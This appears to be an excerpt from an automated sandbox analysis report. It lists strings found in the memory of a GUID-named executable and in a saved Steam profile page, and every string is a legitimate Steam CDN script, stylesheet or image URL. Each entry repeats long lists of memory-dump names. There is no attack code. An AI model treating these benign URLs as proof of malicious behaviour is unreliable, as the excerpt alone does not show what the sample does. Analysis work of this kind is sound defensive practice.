Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/main.js?v=_92T
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/applications/community/manifest.js?v=
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/global.js?v=3W_ge11SZngF&l=englis
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&a
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalContent.js?v=XfYrwi9zUC4b&l=
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=engli
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/profile.js?v=47omfdMZRDiz&l=engli
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/promo/stickers.js?v=iGFW_JMULCcZ&
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/reportedc
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&amp
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcD
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/javascript/webui/clientcom.js?v=St3gSJx2HFUZ&amp
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/buttons.css?v=G3UTKgHH4xLD&l=engl
Source: 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/motiva_sans.css?v=nc69vwog8R9p&l=
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_global.css?v=bpFp7zU77IKn&
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/css/shared_responsive.css?v=n4_f9JKDa7wP&
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.p
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.1837635638.0000000000A3A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2565990031.0000000000A9A000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201799460.0000000000A91000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S
Source: 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2522942160.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000A41000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2201845024.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2158798637.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2748505795.0000000000493000.00000004.00000001.01000000.00000008.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000002.2749016935.0000000000AAA000.00000004.00000020.00020000.00000000.sdmp, 168b8f8b-d51b-4eae-b6db-4c4c9add1d5d.exe, 0000000E.00000003.2178005887.0000000000A78000.00000004.00000020.00020000.00000000.sdmp, 76561199804377619[1].htm.14.dr, 76561199804377619[1].htm0.14.dr	String found in binary or memory: https://community.cloudflare.steamstatic.com/public/shared/javascript/shared_global.js?v=0y-Qdz9keFm
